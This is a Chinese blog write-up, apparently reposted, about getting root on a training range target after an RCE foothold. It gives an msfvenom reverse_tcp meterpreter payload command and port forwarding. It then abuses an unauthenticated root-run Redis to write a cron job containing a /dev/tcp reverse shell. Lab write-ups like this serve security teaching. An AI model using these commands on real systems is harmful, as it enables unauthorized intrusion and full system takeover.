美文网首页
linux另类提权之打靶归来

linux另类提权之打靶归来

作者: 重生信息安全 | 来源:发表于2020-03-06 13:05 被阅读0次
本文作者 : 重生信安 - 鲨鱼

​前言:

渗透某安全培训学校在线靶场。不要听见靶场就关闭了此文,客官往下看。

0x01 开端

打开此靶机各种琳琅满目的漏洞让我眼花缭乱,这里我选择一种直击要害的漏洞作为开端,R...C....E...

话不多说直接弹。

收到shell权限较低....

发现shell没有任何权限,无法对文件进行更改和写入。只能对上传目录有写入权限 find -user www。

上传目录通过web访问是没有权限访问的,访问uploads目录会直接跳转404页面。其实上传上PHP马也没什么卵用。

内核打了一圈也没办法提权,像我这种小白是没得0day的。

0x02 收集

没办法不能走内核提权,就开始收集信息看看能不能进行环境变量,SUID,符号链接等提权。

当我执行ps -fu root 命令时.眼前一亮,root权限运行的redis卧槽有搞头,不过不能外连。

0x03 开干

现在需要把6379端口转发出来,我决定用msf进行端口转发,好,我们来操作一把。

生成linux远控

msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=8000 -f elf >shell.elf

但是问题又来了,目前的权限不能执行wget等远程下载操作,这里我们通过上传漏洞将elf文件上传到服务器。

我们CD到上传目录准备执行远控。

这里将msf设置好监听来接收shell。

接下来进行端口转发。

0x04 利用

nmap -A -p 6699 -script redis-info127.0.0.1 对其进行探测得知存在未授权。

./redis-cli -h 127.0.0.1 -p 6699

我不准备写ssh的公私钥了,直接进行弹shell。

我们现在VPS上使用nc监听4445端口。

redis执行:

set xxx "\n\n*/1 * * * */bin/bash -i>&/dev/tcp/ip/44440>&1\n\n"

config set dir /var/spool/cron

config setdbfilename root

save

root权限到手。

还望大佬们多多指点。

相关文章

  • linux另类提权之打靶归来

    本文作者 : 重生信安 - 鲨鱼 ​前言: 渗透某安全培训学校在线靶场。不要听见靶场就关闭了此文,客官往下看。 0...

  • Linux提权

    0x00 Linux提权基础命令 0x01 Linux提权工具 Linux内核CVE提权(github):可能会导...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

  • linux 提权-SUID提权

    前言 最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。 权限解读 先来父复习一下l...

  • linux 提权-sudo提权

    前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势...

  • 打靶归来

    填词:王永泉 谱曲:王永泉 编曲:王永泉 日落西山红霞飞 战士打靶把营归 把营归 胸前红花映彩霞 愉快的歌声满天飞...

  • 打靶归来

    #冷笑话#教授团队成功研发出减肥新药,能让胖人在一个月内瘦下来50斤,这药更神奇的是让人干吃不胖,绝对是胖子的福音...

  • 打靶归来

    县城作为全国的双拥模范县,在辖区范围内驻扎着大大小小十几支部队。我们单位与距县城十多公里外的二团关系比较好。 20...

  • 打靶归来

    我妈是那伙被“专政”的人,却非常喜欢革命歌曲。她把绣花针在头上蹭了几下,开始唱:日落西山红霞飞,战士打靶把营归……...

  • 打靶归来

    今天看到局网挂通知,下周开始打靶考核。 说起打靶,我内心并害怕。虽然不是科班出生,但是打靶成绩,印象当中除了有一次...

网友评论

      本文标题:linux另类提权之打靶归来

      本文链接:https://www.haomeiwen.com/subject/baibrhtx.html